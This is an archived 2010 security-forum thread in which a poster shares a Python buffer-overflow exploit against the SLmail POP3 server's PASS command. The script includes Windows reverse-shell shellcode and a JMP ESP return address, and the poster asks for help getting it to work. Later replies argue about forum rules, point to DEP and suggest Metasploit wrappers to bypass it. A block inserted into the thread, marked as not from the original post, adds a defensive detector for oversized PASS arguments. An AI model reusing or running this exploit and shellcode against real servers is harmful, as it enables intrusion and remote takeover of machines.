-
January 7th, 2010, 02:53 AM
#1
Junior Member
Please help
The target is an XP SP2 machine running an SLmail server which I know is vulnerable to a buffer overflow with the PASS command. So I whipped up the following script:
#!/usr/bin/python
import struct
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode =("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" +
"\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" +
"\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" +
"\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" +
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" +
"\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" +
"\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" +
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" +
"\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" +
"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" +
"\x53\x43\x53\xff\xd0\x68\xc0\xa8\x02\x6c\x66\x68\x11\x5c" +
"\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" +
"\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" +
"\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" +
"\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" +
"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" +
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" +
"\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" +
"\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" +
"\x04\x5f\x53\xff\xd6\xff\xd0")
# where 0x01c7a18b is a JMP ESP in user32.dll on xp sp2
# buffer = '\x41' * 4654 + struct.pack('<L', 0x01c7a18b) + '\x90' * 16 +shellcode
buffer = '\x41' * 4654 + '\x42' * 4 + '\x43' * 48
print "\nSending evil buffer..."
s.connect(('192.168.2.104', 110))
data = s.recv(1024)
s.send('USER ftp' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
The resulting crash shows my four B's sitting pretty in EIP, but when I pass the address of a JMP ESP in user32.dll (done in this case by changing the commented line), the resulting crash holds a different address in EIP which does not point towards my shellcode.
I am certain that someone will point out my stupid mistake easily, but I have been working on this all day and still it does not work...
Thanks in advance for the help,
Ey3l45h
Last edited by ey3l45h; January 7th, 2010 at 04:17 PM.
Reason: I copied and pasted the wrong version of the script.
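As an added example (not code from the original post, and from the monitoring side rather than the attacking side): a small POP3 command inspector that flags the kind of oversized, repetitive or binary PASS argument the script above sends, the sort of check a mail-server log monitor or IDS rule would implement. The sample command lines are constructed, and the 256-byte password threshold is an assumption.

```python
import re

# Constructed sample POP3 client commands, as a capture decoder or server
# log might emit them. Index 2 mimics the thread's layout (4654 bytes of
# filler, 4 bytes that land in EIP, 48 bytes after it); index 4 carries
# a short NOP sled followed by a few arbitrary raw bytes.
SAMPLE_COMMANDS = [
    "USER ftp",
    "PASS s3cret",
    "PASS " + "A" * 4654 + "BBBB" + "C" * 48,
    "USER alice",
    "PASS " + "\x90" * 16 + "\xfc\x6a\xeb",
]

MAX_PASS_LEN = 256  # assumption: generous upper bound for a real password


def inspect_pop3_command(line, max_pass_len=MAX_PASS_LEN):
    """Return the reasons a command looks like an overflow attempt.

    An empty list means the command passed every check.
    """
    m = re.match(r"^(?P<verb>[A-Za-z]+)(?: (?P<arg>.*))?$", line, re.S)
    if not m:
        return ["unparseable command"]
    verb, arg = m.group("verb").upper(), m.group("arg") or ""
    reasons = []
    if verb == "PASS":
        if len(arg) > max_pass_len:
            reasons.append("PASS argument of %d bytes exceeds %d"
                           % (len(arg), max_pass_len))
        # A long run of one repeated byte is the classic padding pattern.
        run = re.search(r"(.)\1{63,}", arg, re.S)
        if run:
            reasons.append("run of %d repeated byte %r"
                           % (len(run.group(0)), run.group(1)))
        # Passwords are printable; raw machine code is not.
        non_print = sum(1 for c in arg if not 32 <= ord(c) < 127)
        if non_print:
            reasons.append("%d non-printable bytes in PASS argument"
                           % non_print)
    return reasons


def scan(commands):
    """Return (index, reasons) for every command that trips a check."""
    flagged = []
    for i, cmd in enumerate(commands):
        reasons = inspect_pop3_command(cmd)
        if reasons:
            flagged.append((i, reasons))
    return flagged
```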
-
January 7th, 2010, 12:19 PM
#2
You are obviously going to get banned if you don't remove that. While I am sure you are not going to read this, anyways - http://antionline.com/faq.php?faq=vb...eading_posting
Parth Maniar,
CISSP, CISM, CISA, SSCP
*Thank you GOD*
Greater the Difficulty, SWEETER the Victory.
Believe in yourself.
-
January 7th, 2010, 01:42 PM
#3
If he's the owner of the machine he's attempting this on, there isn't any law being broken. Wasn't asked in the best manner, but, if the machine is his, there shouldn't be an issue. Other than others here probably not wanting to answer since we have a corporate owner who has to be responsible for any problems on here. The staff here are generally into the stuff we do here (I mean the staff, the mods obviously have an interest) but their bosses, probably not heh.
-
January 7th, 2010, 03:54 PM
#4
Junior Member
@byte~ I am sorry, I did not see anywhere in the rules where it said that one could not post educational projects. Of course this is for practice on my home lab. If you could please link me to something which shows a rule I have broken, I would be the first to remove my post. Thanks for the flaming.
@gore~ I recognize that I could have worded that better. I have been a long-time reader of AO and this was my first post. If you have some advice which would help in the future, maybe some other forums which would be able to help, I would love to hear it.
The question still stands: I still don't know why the address I am entering is destroying the stack in such a way that I cannot get to my JMP ESP.
k thanx bye,
ey3l45h
-
January 8th, 2010, 01:08 AM
#5
-
January 8th, 2010, 01:29 AM
#6
I didn't see a problem with it so I left it alone too. He owns the machine and is simply trying to learn something, and isn't breaking any laws since, again, the machine is his, so he can do with it what he likes. So I just left it alone to grow lol.
-
January 9th, 2010, 07:16 PM
#7
actually once it crashed EIP held "00000000"
It's supposed to do that since it's no longer held in memory. Without the process up and running there would be no need to store a memory address.
-
January 7th, 2010, 04:01 PM
#8
Doesn't even look like the shell is sent to anything at all. It just looks like an unused string in this script to me.
-
January 7th, 2010, 04:16 PM
#9
Junior Member
@~Spec You are right, I was changing a few; I am about to edit that... it did get sent in the script that I ran. I accidentally did not add it to the end of the commented line...
-
January 8th, 2010, 12:11 AM
#10
Not sure, but can this be of any service to you?
Data Execution Prevention (DEP) is a security feature included in modern Microsoft Windows operating systems that is intended to prevent an application or service from executing code from a non-executable memory region. This helps prevent certain exploits that store code via a buffer overflow, for example.
http://en.wikipedia.org/wiki/Data_Execution_Prevention
I believe metasploit has some wrappers to defeat this protection. Just convert the script procedure to your code.